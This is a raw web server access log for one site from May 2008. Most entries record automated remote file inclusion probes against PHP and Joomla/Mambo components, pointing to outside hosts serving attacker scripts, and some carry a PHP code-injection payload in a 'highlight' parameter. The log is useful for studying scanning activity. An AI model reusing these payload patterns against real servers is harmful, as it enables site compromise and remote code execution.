64.34.124.100 - - [04/May/2008:11:19:09 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:11:19:20 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:11:19:20 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:11:19:21 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.7.108.234 - - [04/May/2008:11:19:37 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
64.7.108.234 - - [04/May/2008:11:19:38 -0700] "GET /modifyform.html?code=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
64.7.108.234 - - [04/May/2008:11:19:39 -0700] "GET /logs/modifyform.html?code=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
82.194.71.196 - - [04/May/2008:11:20:02 -0700] "GET /logs/access_071215.log/modifyform.html?code=http://zmartwychwstancy.sosnowiec.pl/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.71.196 - - [04/May/2008:11:20:03 -0700] "GET /modifyform.html?code=http://zmartwychwstancy.sosnowiec.pl/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.71.196 - - [04/May/2008:11:20:03 -0700] "GET /logs/modifyform.html?code=http://zmartwychwstancy.sosnowiec.pl/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.71.196 - - [04/May/2008:11:20:12 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://zmartwychwstancy.sosnowiec.pl/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:11:20:14 -0700] "GET /logs/db.php?path_local=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:11:20:14 -0700] "GET /db.php?path_local=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [04/May/2008:11:21:28 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.216.227 - - [04/May/2008:11:22:20 -0700] "GET /logs/access_071218.log/admin/spaw/spaw_control.class.php?spaw_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [04/May/2008:11:22:20 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [04/May/2008:11:22:20 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [04/May/2008:11:22:28 -0700] "GET /logs/access_071224.log/admin/spaw/spaw_control.class.php?spaw_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:11:22:42 -0700] "GET /logs/access_080306.log/p.php?p=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:11:22:42 -0700] "GET /p.php?p=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:11:22:42 -0700] "GET /logs/p.php?p=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:11:23:12 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:11:23:17 -0700] "GET /index.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.111.210 - - [04/May/2008:11:23:30 -0700] "GET //crontab/run_billing.php?config[include_dir]=http://www.deadword.we.bs/attack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:24:06 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.216.227 - - [04/May/2008:11:24:18 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:11:24:34 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:11:24:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:11:24:35 -0700] "GET /logs/access_080121.log//components/com_minibb.php?absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:11:24:35 -0700] "GET //components/com_minibb.php?absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:11:24:36 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:11:24:58 -0700] "GET /logs/access_080114.log/modules/My_eGallery/index.php?basepath=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:11:24:58 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:11:24:59 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:11:24:59 -0700] "GET /logs/access_080224.log/modules/My_eGallery/index.php?basepath=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:11:25:27 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:11:25:31 -0700] "GET /index.php?mosConfig_absolute_path=http://www.snd.fr/upload/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:11:25:32 -0700] "GET /logs/index.php?body=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:11:25:43 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:11:25:45 -0700] "GET /index.php?body=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:11:26:08 -0700] "GET /logs/index.php?body=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:11:26:20 -0700] "GET /logs/index.php?body=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:11:26:23 -0700] "GET /index.php?body=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:11:26:33 -0700] "GET /index.php?body=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
24.214.175.252 - - [04/May/2008:11:26:49 -0700] "GET /logs/access_080215.log/atom.php5?page=http://www.imperialfutar.hu/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:11:26:49 -0700] "GET /logs//crontab/run_billing.php?config[include_dir]=http://www.deadword.we.bs/mic22.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:11:26:49 -0700] "GET //crontab/run_billing.php?config[include_dir]=http://www.deadword.we.bs/mic22.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:27:55 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:27:56 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:11:27:56 -0700] "GET /logs/access_080226.log//crontab/run_billing.php?config[include_dir]=http://www.deadword.we.bs/mic22.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:11:28:13 -0700] "GET /logs/access_080312.log//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.151.217.136 - - [04/May/2008:11:28:17 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [04/May/2008:11:28:21 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bgsro.go.ro/id.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [04/May/2008:11:28:21 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
81.169.141.165 - - [04/May/2008:11:28:38 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.imageforum.ru//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
81.169.141.165 - - [04/May/2008:11:28:38 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.imageforum.ru//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:11:28:39 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:11:28:39 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:28:40 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.30.216.107 - - [04/May/2008:11:28:45 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:11:28:52 -0700] "GET /logs/access_071229.log//components/com_minibb.php?absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:11:29:23 -0700] "GET /logs/access_080311.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:11:29:24 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:11:29:24 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.231.120.104 - - [04/May/2008:11:29:39 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.231.120.104 - - [04/May/2008:11:29:40 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [04/May/2008:11:30:22 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [04/May/2008:11:30:22 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [04/May/2008:11:30:22 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:11:31:05 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:11:31:09 -0700] "GET //components/com_minibb.php?absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:11:31:11 -0700] "GET /index.php?mosConfig_absolute_path=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:31:11 -0700] "GET /index.php?path[docroot]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:11:31:34 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:11:31:35 -0700] "GET //components/com_minibb.php?absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:11:31:42 -0700] "GET /logs/db.php?path_local=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:11:31:43 -0700] "GET /db.php?path_local=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.231.120.104 - - [04/May/2008:11:32:53 -0700] "GET /logs/phphtml.php?htmlclass_path=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.231.120.104 - - [04/May/2008:11:32:53 -0700] "GET /phphtml.php?htmlclass_path=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [04/May/2008:11:33:11 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [04/May/2008:11:33:12 -0700] "GET //modules/xfsection/modify.php?dir_module=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [04/May/2008:11:33:12 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:33:53 -0700] "GET /index.php?path[docroot]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.197.2 - - [04/May/2008:11:34:26 -0700] "GET /logs/access_080321.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:11:34:28 -0700] "GET /logs/access_080324.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:34:29 -0700] "GET /logs/access_080201.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:11:34:32 -0700] "GET /logs/access_080312.log//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:34:35 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:34:40 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:11:34:43 -0700] "GET /logs/access_080309.log//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:11:34:44 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:11:34:45 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:11:34:46 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.56.79 - - [04/May/2008:11:35:13 -0700] "GET /logs/access_080313.log/components/com_forum/download.php?phpbb_root_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.56.79 - - [04/May/2008:11:35:13 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.56.79 - - [04/May/2008:11:35:13 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:11:35:16 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:11:35:16 -0700] "GET /skin/zero_vote/error.php?dir=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.107 - - [04/May/2008:11:35:18 -0700] "GET /logs/access.log HTTP/1.0" 200 270307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:11:35:45 -0700] "GET /index.php?path[docroot]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:11:35:46 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:11:35:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 4139 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:11:35:52 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.40.56.79 - - [04/May/2008:11:35:56 -0700] "GET /logs/access_080126.log/components/com_forum/download.php?phpbb_root_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:11:36:12 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:11:36:18 -0700] "GET /index.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
78.129.208.30 - - [04/May/2008:11:37:04 -0700] "GET /logs/access_071126.log HTTP/1.1" 200 40511 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:11:37:14 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:11:37:15 -0700] "GET /logs//common/db.php?commonpath=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:11:37:34 -0700] "GET /logs/access_080308.log/index.php?side=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:11:37:35 -0700] "GET /logs/access_080308.log/index.php?side=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:11:37:40 -0700] "GET /logs/index.php?side=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:11:37:41 -0700] "GET /logs/index.php?side=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:11:37:42 -0700] "GET /index.php?side=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:11:37:42 -0700] "GET /index.php?side=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:11:39:01 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:11:39:01 -0700] "GET /modules/xfsection/modify.php?dir_module=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [04/May/2008:11:39:12 -0700] "GET /logs//crontab/run_billing.php?config[include_dir]=http://www.deadword.we.bs/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [04/May/2008:11:39:13 -0700] "GET //crontab/run_billing.php?config[include_dir]=http://www.deadword.we.bs/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:39:26 -0700] "GET /logs/access_080309.log//include.php?path[docroot]=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:39:26 -0700] "GET /logs//include.php?path[docroot]=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
